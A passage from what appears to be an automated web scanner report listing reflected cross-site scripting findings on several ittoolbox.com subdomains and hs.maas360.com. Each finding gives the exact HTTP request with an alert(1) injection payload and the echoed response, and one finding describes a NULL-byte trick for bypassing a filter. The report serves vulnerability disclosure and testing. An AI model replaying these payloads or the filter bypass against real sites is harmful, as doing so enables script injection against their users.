GET /?10760'-alert(1)-'13abc61113d=1 HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84461 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=grg3kuniuerjaqukc1lgab2q; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatabase.ittoolbox.com%2fDefault.aspx%3f10760'-alert(1)-'13abc61113d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.15. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://database.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d8f9"style="x:expression(alert(1))"e81cd8e67a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9=1 HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84576 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s0rz452oux01im550lr1ro55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://database.ittoolbox.com/Default.aspx?2d8f9"style="x:expression(alert(1))"e81cd8e67a9=1" /> ...[SNIP]...
3.16. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://datacenter.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fd5c'-alert(1)-'2d188aeb228 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4fd5c'-alert(1)-'2d188aeb228=1 HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60222 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=csuufpaquxzkzzujtoqiao45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... = null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatacenter.ittoolbox.com%2fDefault.aspx%3f4fd5c'-alert(1)-'2d188aeb228%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.17. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://datacenter.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f7da"style="x:expression(alert(1))"17a38cf4d4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d=1 HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60337 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mpr5s355sxundw45kg2fxj45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datacenter.ittoolbox.com/Default.aspx?9f7da"style="x:expression(alert(1))"17a38cf4d4d=1" /> ...[SNIP]...
3.18. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://datawarehouse.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 847b0'-alert(1)-'3ab80a43f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?847b0'-alert(1)-'3ab80a43f3=1 HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72922 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=anqptn3s0wuprm45uhnmglnm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... ull && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatawarehouse.ittoolbox.com%2fDefault.aspx%3f847b0'-alert(1)-'3ab80a43f3%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.19. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://datawarehouse.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b24"style="x:expression(alert(1))"ecbb8c34bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4=1 HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73038 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=tpkduff0fvaf5henlcqp5u55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datawarehouse.ittoolbox.com/Default.aspx?32b24"style="x:expression(alert(1))"ecbb8c34bb4=1" /> ...[SNIP]...
3.20. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://eai.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedaa'-alert(1)-'0d3480e5fd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aedaa'-alert(1)-'0d3480e5fd0=1 HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71748 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x0s41gvyw1hlstmc0cbyhtax; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:56 GMT Connection: close
3.21. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://eai.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13b20"style="x:expression(alert(1))"5f3efe7bb8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b=1 HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rjzukq4535sibbfa3mbwsqne; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:51 GMT Connection: close
3.22. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://emergingtech.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624cf'-alert(1)-'f8004f9ed87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?624cf'-alert(1)-'f8004f9ed87=1 HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47707 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ktnnm045tqcaqz45m5u3obqr; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Emerging Te ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2femergingtech.ittoolbox.com%2fDefault.aspx%3f624cf'-alert(1)-'f8004f9ed87%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.23. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://emergingtech.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6897"style="x:expression(alert(1))"04e25a4b71d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d=1 HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47822 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=m5xm52bdiwgi1b454avwfk45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Emerging Te ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://emergingtech.ittoolbox.com/Default.aspx?c6897"style="x:expression(alert(1))"04e25a4b71d=1" /> ...[SNIP]...
3.24. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://erp.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b536f"style="x:expression(alert(1))"9e5bf1e52b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9=1 HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74874 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uzdvbjavj2zyvp550xl533uo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:57 GMT Connection: close
3.25. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://erp.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e573'-alert(1)-'1b04ac79209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6e573'-alert(1)-'1b04ac79209=1 HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74757 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=05bm4jvm03f05leelbecgtvo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:02 GMT Connection: close
3.26. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hardware.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a39f'-alert(1)-'bbb340ffdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1a39f'-alert(1)-'bbb340ffdfa=1 HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78783 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wqd5uw45dqu3kh553yd53xb3; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fhardware.ittoolbox.com%2fDefault.aspx%3f1a39f'-alert(1)-'bbb340ffdfa%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.27. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hardware.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 905e6"style="x:expression(alert(1))"f8c60833ac1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1=1 HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78898 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=l015iq5554rrn1qehqeunl45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://hardware.ittoolbox.com/Default.aspx?905e6"style="x:expression(alert(1))"f8c60833ac1=1" /> ...[SNIP]...
The value of the A request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35549"><script>alert(1)</script>dc2e0902316 was submitted in the A parameter. This input was echoed as 35549\"><script>alert(1)</script>dc2e0902316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95&A=marchex35549"><script>alert(1)</script>dc2e0902316&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:41 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50090"><script>alert(1)</script>c217ab0b9fa was submitted in the O parameter. This input was echoed as 50090\"><script>alert(1)</script>c217ab0b9fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95&A=marchex&O=HS50090"><script>alert(1)</script>c217ab0b9fa&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:47 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf14"><script>alert(1)</script>4e101bed925 was submitted in the REST URL parameter 1. This input was echoed as 4bf14\"><script>alert(1)</script>4e101bed925 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper4bf14"><script>alert(1)</script>4e101bed925/ HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:43 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe51e"><script>alert(1)</script>eb667fd33ac was submitted in the id parameter. This input was echoed as fe51e\"><script>alert(1)</script>eb667fd33ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95fe51e"><script>alert(1)</script>eb667fd33ac&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:40 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
3.32. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hs.maas360.com
Path:
/white-paper/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360ea"><script>alert(1)</script>364e31c891a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 360ea\"><script>alert(1)</script>364e31c891a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?360ea"><script>alert(1)</script>364e31c891a=1 HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:36 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
